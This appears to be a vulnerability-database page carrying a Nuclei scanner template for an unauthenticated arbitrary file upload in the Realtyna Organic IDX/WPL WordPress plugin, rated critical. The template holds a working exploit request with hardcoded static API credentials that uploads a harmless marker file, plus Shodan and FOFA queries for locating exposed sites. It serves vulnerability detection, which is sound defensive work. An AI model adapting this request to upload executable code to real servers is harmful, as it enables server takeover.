Lucene search
+L

Realtyna Organic IDX/WPL <= 5.2.0 - Unauthenticated Arbitrary File Upload

🗓️ 15 Aug 2026 02:21:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Unauthenticated arbitrary file upload in Realtyna Organic IDX/WPL <= 5.2.0 enables remote code execution.

Related
Refs
Code
id: CVE-2026-14483

info:
  name: Realtyna Organic IDX/WPL <= 5.2.0 - Unauthenticated Arbitrary File Upload
  author: str4k3r
  severity: critical
  description: |
    Realtyna Organic IDX plugin + WPL Real Estate plugin for WordPress <= 5.2.0 contains an unrestricted file upload vulnerability caused by missing file type validation and static API credentials, letting unauthenticated attackers upload executable files and achieve remote code execution, exploit requires knowledge of static API credentials.
  impact: |
    Unauthenticated attackers can upload executable files, leading to remote code execution and full server compromise.
  remediation: |
    Update to a version later than 5.2.0 or apply patches that enforce proper file validation and unique API credentials.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-14483
    - https://github.com/0xdak/CVE-2026-14483_exploit
    - https://wordpress.org/plugins/real-estate-listing-realtyna-wpl/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-14483
    epss-score: 0.00611
    epss-percentile: 0.46216
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    vendor: realtyna
    product: real-estate-listing-realtyna-wpl
    shodan-query: http.html:"real-estate-listing-realtyna-wpl"
    fofa-query: body="real-estate-listing-realtyna-wpl"
  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth,intrusive

flow: http(1) && http(2)

variables:
  probe_filename: "image_CVE14483_{{rand_base(10)}}.txt"

http:
  - raw:
      - |
        GET /wp-content/plugins/real-estate-listing-realtyna-wpl/readme.txt HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "WPL Real Estate", "Realtyna Organic IDX", "Organic IDX plugin")'
          - 'compare_versions(ver, "<= 5.2.0")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: ver
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9][0-9.]+)'
        internal: true

  - raw:
      - |
        POST /?wplformat=io&wplview=io&public_key=U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w&private_key=Eft76bdh0o2uyhJkbG3T&commands_directory=mobile_application&cmd=set_property&user_id=1&dformat=json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----CVE14483Boundary

        ------CVE14483Boundary
        Content-Disposition: form-data; name="file[]"; filename="{{probe_filename}}"
        Content-Type: text/plain

        CVE14483_SAFE_MARKER
        ------CVE14483Boundary--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "\"result\"", "\"success\":true")'
        condition: and
# digest: 4a0a00473045022100d2acaacf7e24d5cf43c602b48ceb84ae952a36e2b1f917f80df4fb250543cc340220691933a620283afbde94d5f1e521eb72b14129237eccc84a364532111ddb60f2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Aug 2026 21:45Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.19.8
EPSS0.00611
SSVC
6